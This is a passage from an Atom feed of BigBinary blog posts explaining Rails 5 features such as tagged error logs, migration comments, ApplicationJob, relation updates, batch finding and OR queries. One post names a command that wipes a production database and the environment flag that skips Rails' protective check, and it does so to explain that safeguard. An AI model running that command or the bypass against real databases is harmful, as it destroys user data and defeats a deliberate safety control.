      <content type="html"><![CDATA[<p>We use<a href="http://guides.rubyonrails.org/debugging_rails_applications.html#tagged-logging">tagged logging</a>to better extract information from logs generated by Rails applications.</p><p>Consider a Rails 4.x application where the request id is used as a log tag byadding following in <code>config/environments/production.rb</code>.</p><pre><code class="language-ruby">config.log_tags = [:uuid]</code></pre><p>The log generated for that application would look like:</p><pre><code class="language-ruby">[df88dbaa-50fd-4178-85d7-d66279ea33b6] Started GET &quot;/posts&quot; for ::1 at 2016-06-03 17:19:32 +0530[df88dbaa-50fd-4178-85d7-d66279ea33b6] Processing by PostsController#index as HTML[df88dbaa-50fd-4178-85d7-d66279ea33b6]   Post Load (0.2ms)  SELECT &quot;posts&quot;.* FROM &quot;posts&quot;[df88dbaa-50fd-4178-85d7-d66279ea33b6]   Rendered posts/index.html.erb within layouts/application (4.8ms)[df88dbaa-50fd-4178-85d7-d66279ea33b6] Completed 500 Internal Server Error in 10ms (ActiveRecord: 0.2ms)[df88dbaa-50fd-4178-85d7-d66279ea33b6]ActionView::Template::Error (divided by 0):    29: &lt;br&gt;    30:    31: &lt;%= link_to 'New Post', new_post_path %&gt;    32: &lt;%= 1/0 %&gt;  app/views/posts/index.html.erb:32:in `/'  app/views/posts/index.html.erb:32:in `_app_views_posts_index_html_erb___110320845380431566_70214104632140'</code></pre><p>As we can see the request id tag is not prepended to the lines containing errordetails. If we search the log file by the request id then the error detailswould not be shown.</p><p>In Rails 5<a href="https://github.com/rails/rails/pull/23203">errors in logs show log tags as well</a>to overcome the problem we saw above.</p><p>Please note that the log tag name for request id has changed in Rails 5. Thesetting would thus look like as shown below.</p><pre><code class="language-ruby">config.log_tags = [:request_id]</code></pre><p>This is how the same log will look like in a Rails 5 application.</p><pre><code class="language-ruby">[7efb4d18-8e55-4d51-b31e-119f49f5a410] Started GET &quot;/&quot; for ::1 at 2016-06-03 17:24:59 +0530[7efb4d18-8e55-4d51-b31e-119f49f5a410] Processing by PostsController#index as HTML[7efb4d18-8e55-4d51-b31e-119f49f5a410]   Rendering posts/index.html.erb within layouts/application[7efb4d18-8e55-4d51-b31e-119f49f5a410]   Post Load (0.9ms)  SELECT &quot;posts&quot;.* FROM &quot;posts&quot;[7efb4d18-8e55-4d51-b31e-119f49f5a410]   Rendered posts/index.html.erb within layouts/application (13.2ms)[7efb4d18-8e55-4d51-b31e-119f49f5a410] Completed 500 Internal Server Error in 30ms (ActiveRecord: 0.9ms)[7efb4d18-8e55-4d51-b31e-119f49f5a410][7efb4d18-8e55-4d51-b31e-119f49f5a410] ActionView::Template::Error (divided by 0):[7efb4d18-8e55-4d51-b31e-119f49f5a410]     29: &lt;br&gt;[7efb4d18-8e55-4d51-b31e-119f49f5a410]     30:[7efb4d18-8e55-4d51-b31e-119f49f5a410]     31: &lt;%= link_to 'New Post', new_post_path %&gt;[7efb4d18-8e55-4d51-b31e-119f49f5a410]     32: &lt;%= 1/0 %&gt;[7efb4d18-8e55-4d51-b31e-119f49f5a410][7efb4d18-8e55-4d51-b31e-119f49f5a410] app/views/posts/index.html.erb:32:in `/'[7efb4d18-8e55-4d51-b31e-119f49f5a410] app/views/posts/index.html.erb:32:in `_app_views_posts_index_html_erb___1136362343261984150_70232665530320'</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 makes sql statements even more colorful]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-makes-sql-statements-even-more-colorful"/>
      <updated>2016-06-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-makes-sql-statements-even-more-colorful</id>
      <content type="html"><![CDATA[<p>In Rails 5, SQL statements have<a href="https://github.com/rails/rails/pull/20607">much more granular level of coloration</a>.</p><h3>INSERT statement</h3><p>Font color for <code>INSERT</code> command is green</p><p><img src="/blog_images/2016/rails-5-makes-sql-statements-even-more-colorful/insert-coloration.png" alt="insert statement in green color"></p><h3>UPDATE and SELECT statement</h3><p>Font color for <code>UPDATE</code> command is yellow and for <code>SELECT</code> it is blue.</p><p><img src="/blog_images/2016/rails-5-makes-sql-statements-even-more-colorful/update-coloration.png" alt="update statement in yellow color"></p><h3>DELETE statement</h3><p>Font color for <code>DELETE</code> command is red.</p><p><img src="/blog_images/2016/rails-5-makes-sql-statements-even-more-colorful/delete-coloration.png" alt="delete statement in red color"></p><p>As you might have noticed from above that font color for <code>transaction</code> is cyan.</p><h3>Rollback statement</h3><p>Font color for <code>Rollback transaction</code> is red.</p><p><img src="/blog_images/2016/rails-5-makes-sql-statements-even-more-colorful/rollback-coloration.png" alt="rollback statement in red color"></p><h3>Other statements</h3><p>For <a href="https://github.com/rails/rails/pull/20921">custom SQL statements color</a> ismagenta and Model Load/exists color is cyan.</p><p><img src="/blog_images/2016/rails-5-makes-sql-statements-even-more-colorful/misc-coloration.png" alt="magenta"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds helpers method in controllers for ease]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-add-helpers-method-to-ease-usage-of-helper-modules-in-controllers"/>
      <updated>2016-06-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-add-helpers-method-to-ease-usage-of-helper-modules-in-controllers</id>
      <content type="html"><![CDATA[<p>Before Rails 5, when we wanted to use any of the helper methods in controllerswe used to do the following.</p><pre><code class="language-ruby">module UsersHelper  def full_name(user)    user.first_name + user.last_name  endendclass UsersController &lt; ApplicationController  include UsersHelper  def update    @user = User.find params[:id]    if @user.update_attributes(user_params)      redirect_to user_path(@user), notice: &quot;#{full_name(@user) is successfully updated}&quot;    else      render :edit    end  endend</code></pre><p>Though this works, it adds all public methods of the included helper module inthe controller.</p><p>This can lead to some of the methods in the helper module conflict with themethods in controllers.</p><p>Also if our helper module has dependency on other helpers, then we need toinclude all of the dependencies in our controller, otherwise it won't work.</p><h2>New way to call helper methods in Rails 5</h2><p>In Rails 5, by using<a href="https://github.com/rails/rails/pull/24866">the new instance level helpers method</a>in the controller, we can access helper methods in controllers.</p><pre><code class="language-ruby">module UsersHelper  def full_name(user)    user.first_name + user.last_name  endendclass UsersController &lt; ApplicationController  def update    @user = User.find params[:id]    if @user.update_attributes(user_params)      notice = &quot;#{helpers.full_name(@user) is successfully updated}&quot;      redirect_to user_path(@user), notice: notice    else      render :edit    end  endend</code></pre><p>This removes some of the drawbacks of including helper modules and is muchcleaner solution.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 supports adding comments in migrations]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-supports-adding-comments-migrations"/>
      <updated>2016-06-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-supports-adding-comments-migrations</id>
      <content type="html"><![CDATA[<p>Database schemas change rapidly as project progresses. And it can be difficultto track purpose of each table and each column in a large project with multipleteam members.</p><p>The solution for this problem is to document data models right from Railsmigrations.</p><h3>Solution in Rails 4</h3><p>You can add comments in Rails 4.x migrations using gems like<a href="https://github.com/pinnymz/migration_comments">migration_comments</a> and<a href="https://github.com/albertosaurus/pg_comment">pg_comment</a>.</p><h3>Solution in Rails 5</h3><p>Rails 5 <a href="https://github.com/rails/rails/pull/22911">allows to specify comments</a>for tables, column and indexes in migrations.</p><p>These comments are stored in database itself.</p><p>Currently only MySQL and PostgreSQL supports adding comments.</p><p>We can add comments in migration as shown below.</p><pre><code class="language-ruby">class CreateProducts &lt; ActiveRecord::Migration[5.0]  def change    create_table :products, comment: 'Products table' do |t|      t.string :name, comment: 'Name of the product'      t.string :barcode, comment: 'Barcode of the product'      t.string :description, comment: 'Product details'      t.float :msrp, comment: 'Maximum Retail Price'      t.float :our_price, comment: 'Selling price'      t.timestamps    end    add_index :products, :name,              name: 'index_products_on_name',              unique: true,              comment: 'Index used to lookup product by name.'  endend</code></pre><p>When we run above migration output will look as shown below.</p><pre><code class="language-ruby">  rails_5_app rake db:migrate:up VERSION=20160429081156== 20160429081156 CreateProducts: migrating ===================================-- create_table(:products, {:comment=&gt;&quot;Products table&quot;})   -&gt; 0.0119s-- add_index(:products, :name, {:name=&gt;&quot;index_products_on_name&quot;, :unique=&gt;true, :comment=&gt;&quot;Index used to lookup product by name.&quot;})   -&gt; 0.0038s== 20160429081156 CreateProducts: migrated (0.0159s) ==========================</code></pre><p>The comments are also dumped in <code>db/schema.rb</code> file for PostgreSQL and MySQL.</p><p><code>db/schema.rb</code> of application will have following content after running<code>products</code> table migration .</p><pre><code class="language-ruby">ActiveRecord::Schema.define(version: 20160429081156) do  # These are extensions that must be enabled in order to support this database  enable_extension &quot;plpgsql&quot;  create_table &quot;products&quot;, force: :cascade, comment: &quot;Products table&quot; do |t|      t.string   &quot;name&quot;,                     comment: &quot;Name of the product&quot;      t.string   &quot;barcode&quot;,                  comment: &quot;Barcode of the product&quot;      t.string   &quot;description&quot;,              comment: &quot;Product details&quot;      t.float    &quot;msrp&quot;,                     comment: &quot;Maximum Retail Price&quot;      t.float    &quot;our_price&quot;,                comment: &quot;Selling price&quot;      t.datetime &quot;created_at&quot;,  null: false      t.datetime &quot;updated_at&quot;,  null: false      t.index [&quot;name&quot;], name: &quot;index_products_on_name&quot;, unique: true, using: :btree, comment: &quot;Index used to lookup product by name.&quot;    endend</code></pre><p>We can view these comments with Database Administration Tools such as MySQLWorkbench or PgAdmin III.</p><p>PgAdmin III will show database structure with comments as shown below.</p><pre><code class="language-plaintext">-- Table: products-- DROP TABLE products;CREATE TABLE products(  id serial NOT NULL,  name character varying, -- Name of the product  barcode character varying, -- Barcode of the product  description character varying, -- Product details with string data type  msrp double precision, -- Maximum Retail price  our_price double precision, -- Selling price  created_at timestamp without time zone NOT NULL,  updated_at timestamp without time zone NOT NULL,  CONSTRAINT products_pkey PRIMARY KEY (id))WITH (  OIDS=FALSE);ALTER TABLE products  OWNER TO postgres;COMMENT ON TABLE products  IS 'Products table';COMMENT ON COLUMN products.name IS 'Name of the product';COMMENT ON COLUMN products.barcode IS 'Barcode of the product';COMMENT ON COLUMN products.description IS 'Product details with string data type';COMMENT ON COLUMN products.msrp IS 'Maximum Retail price';COMMENT ON COLUMN products.our_price IS 'Selling price';-- Index: index_products_on_name-- DROP INDEX index_products_on_name;CREATE UNIQUE INDEX index_products_on_name  ON products  USING btree  (name COLLATE pg_catalog.&quot;default&quot;);COMMENT ON INDEX index_products_on_name  IS 'Index used to lookup product by name.';</code></pre><p>If we update comments through migrations, corresponding comments will be updatedin <code>db/schema.rb</code> file.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 allows UUID as column type in create_join_table]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-create-join-table-with-uuid"/>
      <updated>2016-06-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-create-join-table-with-uuid</id>
      <content type="html"><![CDATA[<p>In Rails 4.x<a href="http://api.rubyonrails.org/classes/ActiveRecord/ConnectionAdapters/SchemaStatements.html#method-i-create_join_table">create_join_table</a>allows us to create new join table with name given in first two arguments.</p><pre><code class="language-ruby">class CreateJoinTableCustomerProduct &lt; ActiveRecord::Migration  def change    create_join_table(:customers, :products)  endend</code></pre><p>It will create new join table <code>customer_products</code> with columns <code>customer_id</code> and<code>product_id</code>. We can also use block with <code>create_join_table</code>.</p><pre><code class="language-ruby">class CreateJoinTableCustomerProduct &lt; ActiveRecord::Migration  def change    create_join_table :customers, :products do |t|      t.index :customer_id      t.index :product_id    end  endend</code></pre><p>However <code>create_join_table</code> won't allows us to define the column type. It willalways create column of <code>integer</code> type. Because Rails 4.x ,by default, supportsprimary key column type as an auto increment <code>integer</code>.</p><p>If we wish to set <code>uuid</code> as a column type, then <code>create_join_table</code> won't work.In such case we have to create join table manually using <code>create_table</code>.</p><p>Here is an example with Rails 4.x.</p><pre><code class="language-ruby">class CreateJoinTableCustomerProduct &lt; ActiveRecord::Migration  def change    create_table :customer_products do |t|      t.uuid :customer_id      t.uuid :product_id    end  endend</code></pre><h2>Rails 5 allows to have UUID as column type in join table</h2><p>Rails 5 has started supporting UUID as a column type for primary key, so<code>create_join_table</code> should also support UUID as a column type instead of onlyintegers. Hence now Rails 5 allows us to use<a href="https://github.com/rails/rails/pull/24221">UUID as a column type with create_join_table</a>.</p><p>Here is revised example.</p><pre><code class="language-ruby">class CreateJoinTableCustomerProduct &lt; ActiveRecord::Migration[5.0]  def change    create_join_table(:customers, :products, column_options: {type: :uuid})  endend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds another base class Application Job for jobs]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-application-jobs-for-jobs"/>
      <updated>2016-06-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-application-jobs-for-jobs</id>
      <content type="html"><![CDATA[<p>Rails 5 has added another base class<a href="https://github.com/rails/rails/pull/19034">ApplicationJob</a> which inherits from<code>ActiveJob::Base</code>. Now by default all new Rails 5 applications will have<code>application_job.rb</code>.</p><pre><code class="language-ruby"># app/jobs/application_job.rbclass ApplicationJob &lt; ActiveJob::Baseend</code></pre><p>In Rails 4.x if we want to use<a href="http://guides.rubyonrails.org/active_job_basics.html">ActiveJob</a> then first weneed to generate a job and all the generated jobs directly inherit from<code>ActiveJob::Base</code>.</p><pre><code class="language-ruby"># app/jobs/guests_cleanup_job.rbclass GuestsCleanupJob &lt; ActiveJob::Base  queue_as :default  def perform(*guests)    # Do something later  endend</code></pre><p>Rails 5 adds explicit base class <code>ApplicationJob</code> for <code>ActiveJob</code>. As you cansee this is not a big change but it is a good change in terms of beingconsistent with how controllers have <code>ApplicationController</code> and models have<a href="application-record-in-rails-5">ApplicationRecord</a>.</p><p>Now <code>ApplicationJob</code> will be a single place to apply all kind of customizationsand extensions needed for an application, instead of applying patch on<code>ActiveJob::Base</code>.</p><h2>Upgrading from Rails 4.x</h2><p>When upgrading from Rails 4.x to Rails 5 we need to create <code>application_job.rb</code>file in <code>app/jobs/</code> and add the following content.</p><pre><code class="language-ruby"># app/jobs/application_job.rbclass ApplicationJob &lt; ActiveJob::Baseend</code></pre><p>We also need to change all the existing job classes to inherit from<code>ApplicationJob</code> instead of <code>ActiveJob::Base</code>.</p><p>Here is the revised code of <code>GuestCleanupJob</code> class.</p><pre><code class="language-ruby"># app/jobs/guests_cleanup_job.rbclass GuestsCleanupJob &lt; ApplicationJob  queue_as :default  def perform(*guests)    # Do something later  endend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Updating records in AR Relation]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-updating-relation-objects-along-with-callbacks-and-validations"/>
      <updated>2016-06-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-updating-relation-objects-along-with-callbacks-and-validations</id>
      <content type="html"><![CDATA[<p>The <code>update_all</code> method when called on an <code>ActiveRecord::Relation</code> objectupdates all the records without invoking any callbacks and validations on therecords being updated.</p><p>Rails 5 supports<a href="https://github.com/rails/rails/pull/11898">update method on an ActiveRecord::Relation object</a>that runs callbacks and validations on all the records in the relation.</p><pre><code class="language-ruby">people = Person.where(country: 'US')people.update(language: 'English', currency: 'USD')</code></pre><p>Internally, the above code runs <code>update</code> method on each <code>Person</code> record whosecountry is <code>'US'</code>.</p><p>Let's see what happens when <code>update</code> is called on a relation in whichvalidations fail on few records.</p><p>We have a Note model. For simplicity let's add a validation that <code>note_text</code>field cannot be blank for first three records.</p><pre><code class="language-ruby">class Note &lt; ApplicationRecord  validate :valid_note  def valid_note   errors.add(:note_text, &quot;note_text is blank&quot;) if id &lt;= 3 &amp;&amp; note_text.blank?  endend</code></pre><p>Now let's try and update all the records with blank <code>note_text</code>.</p><pre><code class="language-ruby"> &gt; Note.all.update(note_text: '')  Note Load (0.3ms)  SELECT `notes`.* FROM `notes`   (0.1ms)  BEGIN   (0.1ms)  ROLLBACK   (0.1ms)  BEGIN   (0.1ms)  ROLLBACK   (0.1ms)  BEGIN   (0.1ms)  ROLLBACK   (0.1ms)  BEGIN  SQL (2.9ms)  UPDATE `notes` SET `note_text` = '', `updated_at` = '2016-06-16 19:42:21' WHERE `notes`.`id` = 3   (0.7ms)  COMMIT   (0.1ms)  BEGIN  SQL (0.3ms)  UPDATE `notes` SET `note_text` = '', `updated_at` = '2016-06-16 19:42:21' WHERE `notes`.`id` = 4   (1.2ms)  COMMIT   (0.1ms)  BEGIN  SQL (0.3ms)  UPDATE `notes` SET `note_text` = '', `updated_at` = '2016-06-16 19:42:21' WHERE `notes`.`id` = 5   (0.3ms)  COMMIT   (0.1ms)  BEGIN  SQL (3.4ms)  UPDATE `notes` SET `note_text` = '', `updated_at` = '2016-06-16 19:42:21' WHERE `notes`.`id` = 6   (0.2ms)  COMMIT =&gt; [#&lt;Note id: 1, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 10:02:54&quot;, updated_at: &quot;2016-06-16 19:42:21&quot;&gt;, #&lt;Note id: 2, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 10:03:54&quot;, updated_at: &quot;2016-06-16 19:42:21&quot;&gt;, #&lt;Note id: 3, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 12:35:20&quot;, updated_at: &quot;2016-06-03 12:35:20&quot;&gt;, #&lt;Note id: 4, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 14:15:15&quot;, updated_at: &quot;2016-06-16 19:14:20&quot;&gt;, #&lt;Note id: 5, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 14:15:41&quot;, updated_at: &quot;2016-06-16 19:42:21&quot;&gt;, #&lt;Note id: 6, user_id: 1, note_text: &quot;&quot;, created_at: &quot;2016-06-03 14:16:20&quot;, updated_at: &quot;2016-06-16 19:42:21&quot;&gt;]</code></pre><p>We can see that failure of validations on records in the relation does not stopus from updating the valid records.</p><p>Also the return value of update on AR Relation is an array of records in therelation. We can see that the attributes in these records hold the values thatwe wanted to have after the update.</p><p>For example in the above mentioned case, we can see that in the returned array,the records with ids 1, 2 and 3 have blank <code>note_text</code> values even though thoserecords weren't updated.</p><p>Hence we may not be able to rely on the return value to know if the update issuccessful on any particular record.</p><p>For scenarios where running validations and callbacks is not important and/orwhere performance is a concern it is advisable to use <code>update_all</code> methodinstead of <code>update</code> method.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 prevents destructive action on production database]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-prevents-destructive-action-on-production-db"/>
      <updated>2016-06-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-prevents-destructive-action-on-production-db</id>
      <content type="html"><![CDATA[<p>Sometimes while debugging production issue mistakenly developers executecommands like <code>RAILS_ENV=production rake db:schema:load</code>. This wipes out data inproduction.</p><p>Users of heroku download all the config variables to local machine to debugproduction problem and sometimes developers mistakenly execute commands whichwipes out production data. This has happened enough number of times to herokuusers that <a href="https://twitter.com/schneems">Richard Schneeman</a> of heroku decidedto do something about this issue.</p><h2>Rails 5 prevents destructive action on production database</h2><p>Rails 5 <a href="https://github.com/rails/rails/pull/22967">has added</a> a new table<code>ar_internal_metadata</code> to store <code>environment</code> version which is used at the timeof migrating the database.</p><p>When the first time <code>rake db:migrate</code> is executed then new table stores thevalue <code>production</code>. Now whenever we load<a href="https://github.com/rails/rails/pull/24399">database schema</a> or<a href="https://github.com/rails/rails/pull/24484">database structure</a> by running<code>rake db:schema:load</code> or <code>rake db:structure:load</code> Rails will check if Railsenvironment is &quot;production&quot; or not. If not then Rails will raise an exceptionand thus preventing the data wipeout.</p><p>To skip this environment check we can manually pass<code>DISABLE_DATABASE_ENVIRONMENT_CHECK=1</code> as an argument with load schema/structuredb command.</p><p>Here is an example of running <code>rake db:schema:load</code> when development db ispointing to production database.</p><pre><code class="language-ruby">$ rake db:schema:loadrake aborted!ActiveRecord::ProtectedEnvironmentError: You are attempting to run a destructive action against your 'production' database.If you are sure you want to continue, run the same command with the environment variable:DISABLE_DATABASE_ENVIRONMENT_CHECK=1</code></pre><p>As we can see Rails prevented data wipeout in production.</p><p>This is one of those features which hopefully you won't notice. However if youhappen to do something destructive to your production database then this featurewill come in handy.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds finish option in find_in_batches]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-provides-finish-option-for-find-in-batches"/>
      <updated>2016-06-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-provides-finish-option-for-find-in-batches</id>
      <content type="html"><![CDATA[<p>In Rails 4.x we had <code>start</code> option in <code>find_in_batches</code> method.</p><pre><code class="language-ruby">Person.find_in_batches(start: 1000, batch_size: 2000) do |group|  group.each { |person| person.party_all_night! }end</code></pre><p>The above code provides batches of <code>Person</code> starting from record whose value ofprimary key is equal to 1000.</p><p>There is no end value for primary key. That means in the above case all therecords that have primary key value greater than 1000 are fetched.</p><p>Rails 5 <a href="https://github.com/rails/rails/pull/12257">introduces finish option</a>that serves as an upper limit to the primary key value in the records beingfetched.</p><pre><code class="language-ruby">Person.find_in_batches(start: 1000, finish: 9500, batch_size: 2000) do |group|  group.each { |person| person.party_all_night! }end</code></pre><p>The above code ensures that no record in any of the batches has the primary keyvalue greater than 9500.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 introduces country_zones helper method]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-introduces-helpers-for-country-zones"/>
      <updated>2016-06-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-introduces-helpers-for-country-zones</id>
      <content type="html"><![CDATA[<p>Before Rails 5, we could fetch all time zones for US by using <code>us_zones</code> methodas follows.</p><pre><code class="language-ruby">&gt; puts ActiveSupport::TimeZone.us_zones.map(&amp;:to_s)(GMT-10:00) Hawaii(GMT-09:00) Alaska(GMT-08:00) Pacific Time (US &amp; Canada)(GMT-07:00) Arizona(GMT-07:00) Mountain Time (US &amp; Canada)(GMT-06:00) Central Time (US &amp; Canada)(GMT-05:00) Eastern Time (US &amp; Canada)(GMT-05:00) Indiana (East)</code></pre><p>Such functionality of getting all the <code>TimeZone</code> objects for a country wasimplemented only for one country, US.</p><p>The <code>TimeZone</code> class internally uses the <code>TzInfo</code> gem which does have an api forproviding timezones for all the countries.</p><p>Realizing this, the Rails community decided to<a href="https://github.com/rails/rails/pull/20625">introduce a helper method country_zones</a>to <code>ActiveSupport::TimeZone</code> class that is able to fetch a collection of<code>TimeZone</code> objects belonging to a country specified by its ISO 3166-1 Alpha2code.</p><pre><code class="language-ruby">&gt; puts ActiveSupport::TimeZone.country_zones('us').map(&amp;:to_s)(GMT-10:00) Hawaii(GMT-09:00) Alaska(GMT-08:00) Pacific Time (US &amp; Canada)(GMT-07:00) Arizona(GMT-07:00) Mountain Time (US &amp; Canada)(GMT-06:00) Central Time (US &amp; Canada)(GMT-05:00) Eastern Time (US &amp; Canada)(GMT-05:00) Indiana (East)&gt;puts ActiveSupport::TimeZone.country_zones('fr').map(&amp;:to_s) (GMT+01:00) Paris</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 provides fragment caching in Action Mailer views]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-provides-fragment-caching-in-action-mailer-view"/>
      <updated>2016-05-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-provides-fragment-caching-in-action-mailer-view</id>
      <content type="html"><![CDATA[<p>Fragment cache helps in caching parts of the view instead of caching the entireview. Fragment caching is used when different parts of the view need to becached and expired separately. Before Rails 5, fragment caching was supportedonly in Action View templates.</p><p>Rails 5 provides<a href="https://github.com/rails/rails/commit/e40518f5d44303ed91641b342a53bdfb32753de3">fragment caching in Action Mailer views</a>. To use this feature, we need to configure our application as follows.</p><pre><code class="language-ruby">config.action_mailer.perform_caching = true</code></pre><p>This configuration specifies whether mailer templates should perform fragmentcaching or not. By default, this is set to <code>false</code> for all environments.</p><h2>Fragment caching in views</h2><p>We can do caching in mailer views similar to application views using <code>cache</code>method. Following example shows usage of fragment caching in mailer view of thewelcome mail.</p><pre><code class="language-ruby">&lt;body&gt; &lt;% cache 'signup-text' do %&gt;   &lt;h1&gt;Welcome to &lt;%= @company.name %&gt;&lt;/h1&gt;   &lt;p&gt;You have successfully signed up to &lt;%= @company.name %&gt;, Your username is: &lt;% end %&gt;     &lt;%= @user.login %&gt;.     &lt;br /&gt;   &lt;/p&gt; &lt;%= render :partial =&gt; 'footer' %&gt;&lt;/body&gt;</code></pre><p>When we render view for the first time, we can see cache digest of the view andits partial.</p><pre><code class="language-ruby">  Cache digest for app/views/user_mailer/_footer.erb: 7313427d26cc1f701b1e0212498cee38  Cache digest for app/views/user_mailer/welcome_email.html.erb: 30efff0173fd5f29a88ffe79a9eab617  Rendered user_mailer/_footer.erb (0.3ms)  Rendered user_mailer/welcome_email.html.erb (26.1ms)  Cache digest for app/views/user_mailer/welcome_email.text.erb: 77f41fe6159c5736ab2026a44bc8de55  Rendered user_mailer/welcome_email.text.erb (0.2ms)UserMailer#welcome_email: processed outbound mail in 190.3ms</code></pre><p>We can also use fragment caching in partials of the action mailer views with<code>cache</code> method. Fragment caching is also supported in multipart emails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds OR support in Active Record]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-or-support-in-active-record"/>
      <updated>2016-05-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-or-support-in-active-record</id>
      <content type="html"><![CDATA[<p>Rails 5<a href="https://github.com/rails/rails/commit/b0b37942d729b6bdcd2e3178eda7fa1de203b3d0">has added OR method</a>to Active Relation for generating queries with OR clause.</p><pre><code class="language-ruby">&gt;&gt; Post.where(id: 1).or(Post.where(title: 'Learn Rails'))   SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE (&quot;posts&quot;.&quot;id&quot; = ? OR &quot;posts&quot;.&quot;title&quot; = ?)  [[&quot;id&quot;, 1], [&quot;title&quot;, &quot;Learn Rails&quot;]]=&gt; &lt;ActiveRecord::Relation [#&lt;Post id: 1, title: 'Rails'&gt;]&gt;</code></pre><p>This returns <code>ActiveRecord::Relation</code> object, which is logical union of tworelations.</p><h3>Some Examples of OR usage</h3><h5>With group and having</h5><pre><code class="language-ruby">&gt;&gt; posts = Post.group(:user_id)&gt;&gt; posts.having('id &gt; 3').or(posts.having('title like &quot;Hi%&quot;'))SELECT &quot;posts&quot;.* FROM &quot;posts&quot; GROUP BY &quot;posts&quot;.&quot;user_id&quot; HAVING ((id &gt; 2) OR (title like &quot;Rails%&quot;))=&gt; &lt;ActiveRecord::Relation [#&lt;Post id: 3, title: &quot;Hi&quot;, user_id: 4&gt;,#&lt;Post id: 6, title: &quot;Another new blog&quot;, user_id: 6&gt;]&gt;</code></pre><h5>With scope</h5><pre><code class="language-ruby">class Post &lt; ApplicationRecord  scope :contains_blog_keyword, -&gt; { where(&quot;title LIKE '%blog%'&quot;) }end&gt;&gt; Post.contains_blog_keyword.or(Post.where('id &gt; 3'))SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE ((title LIKE '%blog%') OR (id &gt; 3))=&gt; &lt;ActiveRecord::Relation [#&lt;Post id: 4, title: &quot;A new blog&quot;, user_id: 6&gt;,#&lt;Post id: 5, title: &quot;Rails blog&quot;, user_id: 4&gt;,#&lt;Post id: 6, title: &quot;Another new blog&quot;, user_id: 6&gt;]&gt;</code></pre><h5>With combination of scopes</h5><pre><code class="language-ruby">class Post &lt; ApplicationRecord  scope :contains_blog_keyword, -&gt; { where(&quot;title LIKE '%blog%'&quot;) }  scope :id_greater_than, -&gt; (id) {where(&quot;id &gt; ?&quot;, id)}  scope :containing_blog_keyword_with_id_greater_than, -&gt;(id) { contains_blog_keyword.or(id_greater_than(id)) }end&gt;&gt; Post.containing_blog_keyword_with_id_greater_than(2)SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE ((title LIKE '%blog%') OR (id &gt; 2)) ORDER BY &quot;posts&quot;.&quot;id&quot; DESC=&gt; &lt;ActiveRecord::Relation [#&lt;Post id: 3, title: &quot;Hi&quot;, user_id: 6&gt;,#&lt;Post id: 4, title: &quot;A new blog&quot;, user_id: 6&gt;,#&lt;Post id: 5, title: &quot;Another new blog&quot;, user_id: 6&gt;,&lt;#Post id: 6, title: &quot;Another new blog&quot;, user_id: 6&gt;]&gt;</code></pre><h4>Constraints for using OR method</h4><p>The two relations must be structurally compatible, they must be scoping the samemodel, and they must differ only by <code>WHERE</code> or <code>HAVING</code>.</p><p>In order to use OR operator, neither relation should have a <code>limit</code>, <code>offset</code>,or <code>distinct</code>.</p><pre><code class="language-ruby">&gt;&gt; Post.where(id: 1).limit(1).or(Post.where(:id =&gt; [2, 3]))ArgumentError: Relation passed to #or must be structurally compatible. Incompatible values: [:limit]</code></pre><p>When <code>limit</code>, <code>offset</code> or <code>distinct</code> is passed only with one relation, then itthrows <code>ArgumentError</code> as shown above.</p><p>As of now, we can use <code>limit</code>, <code>offset</code> or <code>distinct</code> when passed with both therelations and with same the parameters.</p><pre><code class="language-ruby">&gt;&gt; Post.where(id: 1).limit(2).or(Post.where(:id =&gt; [2, 3]).limit(2))SELECT  &quot;posts&quot;.* FROM &quot;posts&quot; WHERE 